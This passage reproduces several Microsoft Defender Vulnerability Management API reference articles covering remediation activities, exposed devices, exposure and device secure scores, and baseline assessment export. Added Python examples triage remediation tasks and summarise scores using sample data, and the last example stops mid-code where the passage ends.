List exposed devices of one remediation activity

Microsoft Defender Vulnerability Management

Vulnerabilities in your organization



Get one remediation activity by ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about
how you can sign up to the Microsoft Defender Vulnerability Management public preview
trial.

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no warranties,
express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender
for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Returns information for the specified remediation activity. Presents the same columns as
"Get all remediation activity", but returns results only for the one specified remediation
activity.

Learn more about remediation activities.

Lists the specified remediation activity (by ID).

URL: GET: /api/remediationTasks/{id}

Permissions
One of the following permissions is required to call this API. To learn more, including how to
choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | RemediationTasks.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | RemediationTask.Read | 'Read Threat and Vulnerability Management vulnerability information'

Properties

Property (ID) | Data type | Description | Example of a returned value
Category | String | Category of the remediation activity (Software/Security configuration) | Software
completerEmail | String | If the remediation activity was manually completed by someone, this column contains their email | Null
completerId | String | If the remediation activity was manually completed by someone, this column contains their object ID | Null
completionMethod | String | A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed" | Automatic
createdOn | DateTime | Time this remediation activity was created | 2021-01-12T18:54:11.5499478Z
Description | String | Description of this remediation activity | Update Microsoft Silverlight to a later version to mitigate known vulnerabilities affecting your devices.
dueOn | DateTime | Due date the creator set for this remediation activity | 2021-01-13T00:00:00Z
fixedDevices | | The number of devices that have been fixed | 2
ID | String | ID of this remediation activity | 097d9735-5479-4899-b1b7-77398899df92
nameId | String | Related product name | Microsoft Silverlight
Priority | String | Priority the creator set for this remediation activity (High\Medium\Low) | High
productId | String | Related product ID | microsoft-_-silverlight
productivityImpactRemediationType | String | A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact." | AllExposedAssets
rbacGroupNames | String | Related device group names | [ "Windows Servers", "Windows 11", "Windows 10" ]
recommendedProgram | String | Recommended program to upgrade to | Null
recommendedVendor | String | Recommended vendor to upgrade to | Null
recommendedVersion | String | Recommended version to update/upgrade to | Null
relatedComponent | String | Related component of this remediation activity (similar to the related component for a security recommendation) | Microsoft Silverlight
requesterEmail | String | Creator email address | globaladmin@UserName.contoso.com
requesterId | String | Creator object ID | r647211f-2e16-43f2-a480-16ar3a2a796r
requesterNotes | String | The notes (free text) the creator added for this remediation activity | Null
Scid | String | SCID of the related security recommendation | Null
Status | String | Remediation activity status (Active/Completed) | Active
statusLastModifiedOn | DateTime | Date when the status field was updated | 2021-01-12T18:54:11.5499487Z
targetDevices | Long | Number of exposed devices that this remediation is applicable to | 43
Title | String | Title of this remediation activity | Microsoft Silverlight
Type | String | Remediation type | Update
vendorId | String | Related vendor name | Microsoft

Example

Request example
HTTP

GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c6e-b555-d6a97013844c

Response example
JSON

{
"@odata.context":
"https://api.securitycenter.windows.com/api/$metadata#RemediationTasks/$entity",
"id": "03942ef5-aecb-4c6e-b555-d6a97013844c",
"title": "Update Microsoft Silverlight",
"createdOn": "2021-02-10T13:20:36.4718166Z",
"requesterId": "65548a1d-efo0-4a7a-8d19-1b967b5c36f4",
"requesterEmail": "user1@contoso.com",
"status": "Active",
"statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
"description": "Update Silverlight to a later version to mitigate 55 known vulnerabilities affecting your devices. Doing so can help lessen the security risk to your organization due to versions which have reached their end-of-support.",
"relatedComponent": "Microsoft Silverlight",
"targetDevices": 18511,
"rbacGroupNames": [
"UnassignedGroup",
"hhh"
],
"fixedDevices": 2866,
"requesterNotes": "test",
"dueOn": "2021-02-11T00:00:00Z",
"category": "Software",
"productivityImpactRemediationType": null,
"priority": "Medium",
"completionMethod": null,
"completerId": null,
"completerEmail": null,
"scid": null,
"type": "Update",
"productId": "microsoft-_-silverlight",
"vendorId": "microsoft",
"nameId": "silverlight",
"recommendedVersion": null,
"recommendedVendor": null,
"recommendedProgram": null
}

See also
Remediation methods and properties
List all remediation activities
List exposed devices of one remediation activity
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization



List all remediation activities
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about
how you can sign up to the Microsoft Defender Vulnerability Management public preview
trial.

Important

Some information in this article relates to prerelease product that may be
substantially modified before it's commercially released. Microsoft makes no warranties,
express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender
for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Returns information about all remediation activities.
Learn more about remediation activities.

URL: GET: /api/remediationTasks

Supports OData V4 queries.
OData supported operators:
$filter on: createdon and status properties.
$top with max value of 10,000.
$skip.

See examples at OData queries with Microsoft Defender for Endpoint.

Permissions
One of the following permissions is required to call this API. To learn more, including how to
choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | RemediationTasks.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | RemediationTask.Read | 'Read Threat and Vulnerability Management vulnerability information'

Properties

Property (ID) | Data type | Description | Example of a returned value
Category | String | Category of the remediation activity (Software/Security configuration) | Software
completerEmail | String | If the remediation activity was manually completed by someone, this column contains their email | Null
completerId | String | If the remediation activity was manually completed by someone, this column contains their object ID | Null
completionMethod | String | A remediation activity can be completed "automatically" (if all the devices are patched) or "manually" by a person who selects "mark as completed" | Automatic
createdOn | DateTime | Time this remediation activity was created | 2021-01-12T18:54:11.5499478Z
Description | String | Description of this remediation activity | Update Microsoft Silverlight to a later version to mitigate known vulnerabilities affecting your devices.
dueOn | DateTime | Due date the creator set for this remediation activity | 2021-01-13T00:00:00Z
fixedDevices | | The number of devices that have been fixed | 2
ID | String | ID of this remediation activity | 097d9735-5479-4899-b1b7-77398899df92
nameId | String | Related product name | Microsoft Silverlight
Priority | String | Priority the creator set for this remediation activity (High\Medium\Low) | High
productId | String | Related product ID | microsoft-_-silverlight
productivityImpactRemediationType | String | A few configuration changes could be requested only for devices that don't affect users. This value indicates the selection between "all exposed devices" or "only devices with no user impact." | AllExposedAssets
rbacGroupNames | String | Related device group names | [ "Windows Servers", "Windows 11", "Windows 10" ]
recommendedProgram | String | Recommended program to upgrade to | Null
recommendedVendor | String | Recommended vendor to upgrade to | Null
recommendedVersion | String | Recommended version to update/upgrade to | Null
relatedComponent | String | Related component of this remediation activity (similar to the related component for a security recommendation) | Microsoft Silverlight
requesterEmail | String | Creator email address | globaladmin@UserName.contoso.com
requesterId | String | Creator object ID | r647211f-2e16-43f2-a480-16ar3a2a796r
requesterNotes | String | The notes (free text) the creator added for this remediation activity | Null
Scid | String | SCID of the related security recommendation | Null
Status | String | Remediation activity status (Active/Completed) | Active
statusLastModifiedOn | DateTime | Date when the status field was updated | 2021-01-12T18:54:11.5499487Z
targetDevices | Long | Number of exposed devices that this remediation is applicable to | 43
Title | String | Title of this remediation activity | Update Microsoft Silverlight
Type | String | Remediation type | Update
vendorId | String | Related vendor name | Microsoft

Example

Request example
HTTP

GET https://api.securitycenter.windows.com/api/remediationtasks/

Response example
JSON

{
    "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#RemediationTasks",
    "value": [
        {
            "id": "03942ef5-aewb-4w6e-b555-d6a97013844w",
            "title": "Update Microsoft Silverlight",
            "createdOn": "2021-02-10T13:20:36.4718166Z",
            "requesterId": "65548a1d-ef00-4a7a-8d19-1b967b5c36f4",
            "requesterEmail": "user1@contoso.com",
            "status": "Active",
            "statusLastModifiedOn": "2021-02-10T13:20:36.4719698Z",
            "description": "Update Silverlight to a later version to mitigate 55 known vulnerabilities affecting your devices. Doing so can help lessen the security risk to your organization due to versions which have reached their end-of-support.",
            "relatedComponent": "Microsoft Silverlight",
            "targetDevices": 18511,
            "rbacGroupNames": [
                "UnassignedGroup",
                "hhh"
            ],
            "fixedDevices": 2866,
            "requesterNotes": "test",
            "dueOn": "2021-02-11T00:00:00Z",
            "category": "Software",
            "productivityImpactRemediationType": null,
            "priority": "Medium",
            "completionMethod": null,
            "completerId": null,
            "completerEmail": null,
            "scid": null,
            "type": "Update",
            "productId": "microsoft-_-silverlight",
            "vendorId": "microsoft",
            "nameId": "silverlight",
            "recommendedVersion": null,
            "recommendedVendor": null,
            "recommendedProgram": null
        }
    ]
}

See also
Remediation methods and properties
Get one remediation activity by ID
List exposed devices of one remediation activity
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech
Community: Microsoft Defender for Endpoint Tech Community.


List exposed devices of one remediation
activity
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API Description
Returns information about exposed devices for the specified remediation task.

Learn more about remediation activities.


List exposed devices associated with a remediation task (id)
URL: GET /api/remediationTasks/{id}/machineReferences

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | RemediationTasks.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | RemediationTask.Read.Read | 'Read Threat and Vulnerability Management vulnerability information'

Properties details

Property (id) | Data type | Description | Example
id | String | Device ID | w2957837fwda8w9ae7f023dba081059dw8d94503
computerDnsName | String | Device name | PC-SRV2012R2Foo.UserNameVldNet.local
osPlatform | String | Device operating system | WindowsServer2012R2
rbacGroupName | String | Name of the device group this device is associated with | Servers

Example
Request example
HTTP

GET https://api.securitycenter.windows.com/api/remediationtasks/03942ef5-aecb-4c6e-b555-d6a97013844c/machinereferences

Response example
JSON

{
    "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineReferences",
    "value": [
        {
            "id": "3cb5df6bb3640a2d37ad09fcd357b182d684fafc",
            "computerDnsName": "ComputerPII_2ea21b2d97c9df23c143ad9e3e454cb674232529.DomainPII_21eed80b086e79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
            "osPlatform": "WindowsServer2016",
            "rbacGroupName": "UnassignedGroup"
        },
        {
            "id": "3d9b1ca53e8f077199c7dcbfc9dbfa78f9bf1918",
            "computerDnsName": "ComputerPII_001d606fc149567c192747f48fae304b43c0ddba.DomainxPII_21eed80b086e79bdfa178eabfa25e8be9acfa346.corp.contoso.com",
            "osPlatform": "WindowsServer2012R2",
            "rbacGroupName": "UnassignedGroup"
        },
        {
            "id": "3db8b27e6172951d7ea2e2d75945abec56feaf82",
            "computerDnsName": "ComputerPII_ce60cfbjj4b82a091deb5eae560332bba99a9bd7.DomainPII_0bc1aee0fa396d175e514bd61a9e7a5b2b07ee8e.corp.contoso.com",
            "osPlatform": "WindowsServer2016",
            "rbacGroupName": "UnassignedGroup"
        },
        {
            "id": "3bad326dcda5b53fab47408cd4a7080f3f3cc8ab",
            "computerDnsName": "ComputerPII_b6b35960dd6539d1d1cef5ada02e235e7b357408.DomainPII_21eed80b089e76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
            "osPlatform": "WindowsServer2012R2",
            "rbacGroupName": "UnassignedGroup"
        }
    ]
}
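The two calls documented above (list remediation activities, then list the devices still exposed to one of them) are the raw material for a remediation triage report. The following is an added example, not code from the Microsoft documentation or the Defender API; it assumes a caller-supplied get_json(path) that performs the authenticated GET and returns the decoded body, and every response it reads is a constructed sample shaped like the documented ones.

```python
"""Triage remediation activities and the devices still exposed to them.

Added example (not Microsoft's code). get_json(path) is assumed to be a caller-supplied
authenticated GET returning the decoded JSON body; the responses below are constructed
samples shaped like the documented ones.
"""
import re
from collections import Counter
from datetime import datetime, timezone

# Constructed sample for GET /api/remediationTasks (only the fields used here).
SAMPLE_TASKS = {"value": [
    {"id": "task-1", "title": "Update Microsoft Silverlight", "status": "Active",
     "priority": "High", "dueOn": "2021-02-11T00:00:00Z", "targetDevices": 4, "fixedDevices": 1},
    {"id": "task-2", "title": "Update Adobe Reader", "status": "Completed",
     "priority": "Medium", "dueOn": "2021-01-20T00:00:00Z", "targetDevices": 10, "fixedDevices": 10},
    {"id": "task-3", "title": "Disable SMBv1", "status": "Active",
     "priority": "Low", "dueOn": "2099-01-01T00:00:00Z", "targetDevices": 0, "fixedDevices": 0},
]}

# Constructed sample for GET /api/remediationTasks/{id}/machineReferences.
SAMPLE_MACHINES = {
    "task-1": {"value": [
        {"id": "m1", "computerDnsName": "srv1.corp.contoso.com",
         "osPlatform": "WindowsServer2016", "rbacGroupName": "Servers"},
        {"id": "m2", "computerDnsName": "srv2.corp.contoso.com",
         "osPlatform": "WindowsServer2012R2", "rbacGroupName": "Servers"},
        {"id": "m3", "computerDnsName": "srv3.corp.contoso.com",
         "osPlatform": "WindowsServer2016", "rbacGroupName": "UnassignedGroup"},
    ]},
    "task-3": {"value": []},
}

# Constructed "now" so the overdue check is deterministic.
SAMPLE_NOW = datetime(2021, 3, 1, tzinfo=timezone.utc)


def sample_get_json(path):
    """Stand-in for the authenticated GET: routes the two documented paths to the samples."""
    if path == "/api/remediationTasks":
        return SAMPLE_TASKS
    m = re.fullmatch(r"/api/remediationTasks/([^/]+)/machineReferences", path)
    if m and m.group(1) in SAMPLE_MACHINES:
        return SAMPLE_MACHINES[m.group(1)]
    raise KeyError(path)


def parse_api_time(value):
    """Parse the API's UTC timestamps; fractions can be 7 digits long, so drop them."""
    value = re.sub(r"\.\d+", "", value)
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def remediation_progress(task):
    """Share of targeted devices already fixed (0.0 when nothing is targeted)."""
    target = task.get("targetDevices") or 0
    return (task.get("fixedDevices") or 0) / target if target else 0.0


def is_overdue(task, now):
    """An Active activity whose dueOn has already passed."""
    return (task.get("status") == "Active" and bool(task.get("dueOn"))
            and parse_api_time(task["dueOn"]) < now)


def exposed_by_platform(machine_refs):
    """Tally a task's still-exposed devices per osPlatform."""
    return Counter(m.get("osPlatform", "unknown") for m in machine_refs)


def triage(get_json, now):
    """One report entry per Active remediation activity, with its exposed-device breakdown."""
    report = []
    for task in get_json("/api/remediationTasks")["value"]:
        if task.get("status") != "Active":
            continue
        refs = get_json(f"/api/remediationTasks/{task['id']}/machineReferences")["value"]
        report.append({
            "id": task["id"],
            "title": task["title"],
            "priority": task.get("priority"),
            "progress": remediation_progress(task),
            "overdue": is_overdue(task, now),
            "exposed_by_platform": dict(exposed_by_platform(refs)),
        })
    # Overdue first, then highest priority, then least progress.
    rank = {"High": 0, "Medium": 1, "Low": 2}
    report.sort(key=lambda e: (not e["overdue"], rank.get(e["priority"], 3), e["progress"]))
    return report


if __name__ == "__main__":
    for entry in triage(sample_get_json, SAMPLE_NOW):
        print(entry)
```

Completed activities are skipped because their machineReferences list is no longer interesting; the per-platform tally of the remaining devices is what tells you whether a stalled activity is blocked on one OS family.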

See also
Remediation methods and properties
Get one remediation activity by Id
List all remediation activities
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization



Score resource type
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Methods

Method | Return Type | Description
Get exposure score | Score | Get the organizational exposure score.
Get device secure score | Score | Get the organizational device secure score.
List exposure score by device group | Score | List scores by device group.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Properties

Property | Type | Description
Score | Double | The current score.
Time | DateTime | The date and time in which the call for this API was made.
RbacGroupName | String | The device group name.
RbacGroupId | String | The device group ID.



List exposure score by device group
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves the exposure score for each machine group.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Score.Read.All | 'Read Threat and Vulnerability Management score'
Delegated (work or school account) | Score.Read | 'Read Threat and Vulnerability Management score'

HTTP request
HTTP

GET /api/exposureScore/ByMachineGroups

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with a list of exposure scores per device group
in the response body.

Example

Example request
Here is an example of the request.

HTTP
GET https://api.securitycenter.microsoft.com/api/exposureScore/ByMachineGroups

Example response
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#ExposureScore",
    "value": [
        {
            "time": "2019-12-03T09:51:28.214338Z",
            "score": 41.38041766305988,
            "rbacGroupName": "GroupOne"
        },
        {
            "time": "2019-12-03T09:51:28.2143399Z",
            "score": 37.403726933165366,
            "rbacGroupName": "GroupTwo"
        }
        ...
    ]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management exposure score

Get exposure score
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Retrieves the organizational exposure score.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Score.Read.All | 'Read Threat and Vulnerability Management score'
Delegated (work or school account) | Score.Read | 'Read Threat and Vulnerability Management score'

HTTP request
HTTP

GET /api/exposureScore

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with the exposure data in the response body.

Example

Request
Here is an example of the request.

HTTP
GET https://api.securitycenter.microsoft.com/api/exposureScore

Response
Here is an example of the response.

Note

The response list shown here may be truncated for brevity.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#ExposureScore/$entity",
    "time": "2019-12-03T07:23:53.280499Z",
    "score": 33.491554051195706
}

See also
Microsoft Defender Vulnerability Management
Defender Vulnerability Management exposure score



Get device secure score
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geo location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Retrieves your Microsoft Secure Score for Devices. A higher Microsoft Secure Score for
Devices means your endpoints are more resilient to cybersecurity attacks.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | Score.Read.All | 'Read Threat and Vulnerability Management score'
Delegated (work or school account) | Score.Read | 'Read Threat and Vulnerability Management score'

HTTP request
HTTP

GET /api/configurationScore

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with the device secure score data in the
response body.

Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/configurationScore

Response example
Here is an example of the response.

Note

The response list shown here may be truncated for brevity.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#ConfigurationScore/$entity",
    "time": "2019-12-03T09:15:58.1665846Z",
    "score": 340
}
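The three score endpoints described in this group of articles (organizational exposure score, exposure score per device group, and device secure score) each return a single point-in-time value, so the useful work is collecting them together and comparing across groups and across time. The following is an added example, not code from the Microsoft documentation; it assumes get_json(path) is a caller-supplied authenticated GET that returns the decoded body, and its sample values reuse the figures from the documented responses plus one constructed group, GroupThree.

```python
"""Collect the three score endpoints into one snapshot and compare groups.

Added example (not Microsoft's code). get_json(path) is assumed to be a caller-supplied
authenticated GET returning the decoded body. Sample values below reuse the documented
example responses plus one constructed group (GroupThree).
"""

SAMPLE_RESPONSES = {
    "/api/exposureScore": {"time": "2019-12-03T07:23:53.280499Z", "score": 33.491554051195706},
    "/api/exposureScore/ByMachineGroups": {"value": [
        {"time": "2019-12-03T09:51:28.214338Z", "score": 41.38041766305988, "rbacGroupName": "GroupOne"},
        {"time": "2019-12-03T09:51:28.2143399Z", "score": 37.403726933165366, "rbacGroupName": "GroupTwo"},
        {"time": "2019-12-03T09:51:28.2143399Z", "score": 12.5, "rbacGroupName": "GroupThree"},  # constructed
    ]},
    "/api/configurationScore": {"time": "2019-12-03T09:15:58.1665846Z", "score": 340},
}


def sample_get_json(path):
    """Stand-in for the authenticated GET."""
    return SAMPLE_RESPONSES[path]


def collect_score_snapshot(get_json):
    """Call all three endpoints once and return a flat record suitable for storing."""
    org = get_json("/api/exposureScore")
    groups = get_json("/api/exposureScore/ByMachineGroups").get("value", [])
    secure = get_json("/api/configurationScore")
    return {
        "time": org["time"],
        "exposure_score": org["score"],          # exposure: lower is better
        "device_secure_score": secure["score"],  # secure score: higher is better
        "groups": {g["rbacGroupName"]: g["score"] for g in groups},
    }


def groups_above_org(snapshot):
    """Device groups whose exposure score exceeds the organizational one, worst first."""
    org = snapshot["exposure_score"]
    worse = [name for name, score in snapshot["groups"].items() if score > org]
    return sorted(worse, key=lambda name: snapshot["groups"][name], reverse=True)


def exposure_deltas(previous, current):
    """Per-group change in exposure score between two snapshots (positive = exposure grew)."""
    common = previous["groups"].keys() & current["groups"].keys()
    return {name: current["groups"][name] - previous["groups"][name] for name in common}


if __name__ == "__main__":
    snap = collect_score_snapshot(sample_get_json)
    print(snap["exposure_score"], snap["device_secure_score"], groups_above_org(snap))
```

Because the API only ever returns the current value, trending requires the caller to persist each snapshot; exposure_deltas then works on any two stored records, ignoring groups that were created or removed between them.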

See also
OData queries with Microsoft Defender for Endpoint



Export security baselines assessment per
device
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender Vulnerability Management? Learn more
about how you can sign up to the Microsoft Defender Vulnerability Management
public preview trial.

There are different API calls to get different types of data. In general, each API call
contains the requisite data for devices in your organization.

JSON response: The API pulls all data in your organization as JSON responses. This
method is best for small organizations with fewer than 100K devices. The response is
paginated, so you can use the @odata.nextLink field from the response to fetch
the next results.

Via files: This API solution enables pulling larger amounts of data faster and more
reliably, so it's recommended for large organizations with more than 100K
devices. This API pulls all data in your organization as download files. The response
contains URLs to download all the data from Azure Storage. You can download
data from Azure Storage as follows:
1. Call the API to get a list of download URLs with all your organization data.
2. Download all the files using the download URLs and process the data as you
like.

Data that is collected using either method ('JSON response' or 'via files') is the current snapshot of
the current state. It doesn't contain historic data. To collect historic data, customers must
save the data in their own data storage.

Note

Unless indicated otherwise, all export security baseline assessment methods listed
are full export and by device (also referred to as per device).

1. Export security baselines assessment (JSON response)

1.1 API method description

Returns all security baselines assessments for all devices, on a per-device basis. It returns
a table with a separate entry for every unique combination of DeviceId, ProfileId,
ConfigurationId.

1.2 Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs for details.

Permission type | Permission | Permission display name
Application | SecurityBaselinesAssessment.Read.All | 'Read all security baselines assessments information'
Delegated (work or school account) | SecurityBaselinesAssessment.Read | 'Read security baselines assessments information'

1.3 Limitations
Maximum page size is 200,000.
Rate limitations for this API are 30 calls per minute and 1000 calls per hour.

1.4 Parameters
pageSize (default = 50,000): Number of results in response.
$top: Number of results to return (doesn't return @odata.nextLink and so doesn't
pull all the data).

1.5 HTTP request

HTTP

GET /api/machines/baselineComplianceAssessmentByMachine

1.6 Properties (JSON response)

Note

Each record is approximately 1 KB of data. You should take this into account when
choosing the correct pageSize parameter.

Some additional columns might be returned in the response. These columns are
temporary and might be removed. Only use the documented columns.

The properties defined in the following table are listed alphabetically by property
ID. When running this API, the resulting output will not necessarily be returned in
the same order listed in this table.

Property (ID) | Data type | Description
configurationId | String | Unique identifier for a specific configuration in the baseline benchmark.
profileId | String | Unique identifier for the profile assessed.
deviceId | String | Unique identifier for the device in the service.
deviceName | String | Fully qualified domain name (FQDN) of the device.
isApplicable | Boolean | Indicates whether the configuration is applicable to this device.
isCompliant | Boolean | Indicates whether the device is compliant with configuration.
id | String | Unique identifier for the record, which is a combination of DeviceId, ProfileId, and ConfigurationId.
osVersion | String | Specific version of the operating system running on the device.
osPlatform | String | Operating system platform running on the device. Specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See MDVM supported operating systems and platforms for details.
rbacGroupId | Int | The role-based access control (RBAC) group Id. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
rbacGroupName | String | The role-based access control (RBAC) group. If the device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
DataCollectionTimeOffset | DateTime | The time the data was collected from the device. This field may not appear if no data was collected.
ComplianceCalculationTimeOffset | DateTime | The time the assessment calculation was made.
RecommendedValue | String | Set of expected values for the current device setting to be compliant.
CurrentValue | String | Set of detected values found on the device.
Source | String | The registry path or other location used to determine the current device setting.

1.7 Example

1.7.1 Request example

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/BaselineComplianceAssessmentByMachine

1.7.2 Response example

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetBaselineAssessment)",
    "value": [
        {
            "id": "0000682575d5d473e82ed4d8680425d152411251_9e1b90be-e83e-485b-a5ec-4a429412e734_1.1.1",
            "configurationId": "1.1.1",
            "deviceId": "0000682575d5d473242222425d152411251",
            "deviceName": "ComputerPII_365f5c0bb7202c163937dad3d017969b2d760eb4.DomainPII_29596",
            "profileId": "9e1b90be-e83e-485b-a5ec-4a429412e734",
            "osPlatform": "WindowsServer2019",
            "osVersion": "10.0.17763.2330",
            "rbacGroupId": 86,
            "rbacGroupName": "UnassignedGroup",
            "isApplicable": true,
            "isCompliant": false,
            "dataCollectionTimeOffset": "2021-12-22T00:08:02.478Z",
            "recommendedValue": [
                "Greater than or equal '24'"
            ],
            "currentValue": [
                "24"
            ],
            "source": [
                "password_hist_len"
            ]
        }
    ]
}
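The JSON-response export is paginated: each page carries an @odata.nextLink until the last one, and a request that uses $top returns no nextLink at all. The following is an added example, not code from the Microsoft documentation; it assumes get_json(url) is a caller-supplied authenticated GET returning the decoded body, and the two pages it reads are constructed samples that mimic a pageSize=2 response (the continuation link is constructed too, and is treated as an opaque URL exactly as a real one must be).

```python
"""Walk the paginated per-device baseline assessment and summarise compliance per device.

Added example (not Microsoft's code). get_json(url) is assumed to be a caller-supplied
authenticated GET returning the decoded body; the pages below are constructed samples.
"""
from collections import defaultdict

BASE = "https://api.securitycenter.microsoft.com"
FIRST_PAGE = f"{BASE}/api/machines/baselineComplianceAssessmentByMachine?pageSize=2"
# Constructed continuation link; real ones are opaque and must be used verbatim.
NEXT_PAGE = FIRST_PAGE + "&constructedContinuation=2"


def rec(device, profile, config, applicable, compliant):
    """Build one constructed assessment record with the documented field names."""
    return {"id": f"{device}_{profile}_{config}", "deviceName": device, "profileId": profile,
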